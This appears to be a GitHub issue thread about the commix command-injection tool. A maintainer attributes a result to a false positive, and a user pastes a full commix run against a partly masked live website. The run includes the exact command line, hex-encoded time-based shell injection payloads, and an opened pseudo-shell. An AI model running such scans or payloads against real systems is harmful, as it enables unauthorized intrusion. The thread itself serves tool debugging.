stasinopoulos
commented
7 years ago Hey, this is probably due to a false positive result. I 'm going to check out the heuristics in order to possibly prevent this kind of false positive results. Thanks for the heads up.
I do not understand the system's response
i am whitehat bugbounty researcher this answer is not isolated I encounter every time in remote
:~$ sudo commix -v 1 -u "http://ci****.il***********.com/?save-as=Bookmark&filename=Peter%2bWinter" --cookie="geoloccitta=Pau;geolocprov=deleted" --random-agent -p Cookie --technique=t --level=3 --tamper=hexencode --batch [sudo] Mot de passe de fakessh : commix.py
__ /_\
/`\ / `\ /'
__\ /' ` `\/\ \ /\ \/'\ v1.8-dev#22 /\ _//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \/> </\ __\ __/\ _\ _\ _\ _\ _\ _\ _\/_/\\ http://commixproject.com \/_/\// \//\//\//\//\//\//\//\//\// (@commixproject)
+-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst) +--
[] Checking connection to the target URL... [ SUCCEED ] [] Identifying the target server... [ SUCCEED ] [+] The target server was identified as Apache. [] Identifying the target application ... [ FAILED ] [!] Warning: Heuristics have failed to identify target application. [] Loading tamper script(s): [~] hexencode [!] Warning: Heuristics have failed to identify server's operating system. [?] Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > U [] Identifing the indicated web-page charset... [ SUCCEED ] [!] Warning: The indicated web-page charset iso-8859-1 seems unknown. [] Setting the HTTP header User-Agent for tests. [] Estimating the target URL response time... [ SUCCEED ] [] Testing the (blind) time-based command injection technique... | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203120213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203220213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203320213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203420213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203520213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203620213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203720213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203820213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 3b7374723d24286563686f2050554f4d5152293b737472313d242865787072206c656e67746820222473747222293b6966205b203920213d202473747231205d3b7468656e20736c65657020303b656c736520736c65657020313b666920 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2031202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2032202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2033202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2034202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2035202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2036202d6571202473747231205d202626736c656570203120 [*] Testing the reliability of used payload... | 26736c65657020302026267374723d2224286563686f202428657870722030202b20312929222626737472313d242865787072206c656e677468202224737472222926265b2031202d6571202473747231205d202626736c656570203120 |_ 26736c65657020302026267374723d222428657870722030202b203129222026265b2031202d657120247b7374727d205d202626736c656570203120 [+] The HTTP header User-Agent seems injectable via (blind) time-based command injection technique. [~] Payload: 26736c65657020302026267374723d24286563686f205a46534b475829202626737472313d242865787072206c656e677468202224737472222926265b2036202d6571202473747231205d202626736c656570203120
Pseudo-Terminal (type '?' for available options) commix(os_shell) > id
[*] Retrieving the length of execution output... | 26736c65657020302026267374723d2224286563686f20242869642929222626737472313d242865787072206c656e677468202224737472222926265b2031202d6571202473747231205d202626736c656570203120 | 26736c65657020302026267374723d2224286563686f20242869642929222626737472313d242865787072206c656e677468202224737472222926265b2032202d6571202473747231205d202626736c656570203120
[+] Retrieved 2 characters. [*] Presuming the execution output, please wait...
A`
[*] Finished in 00:00:02.
commix(os_shell) >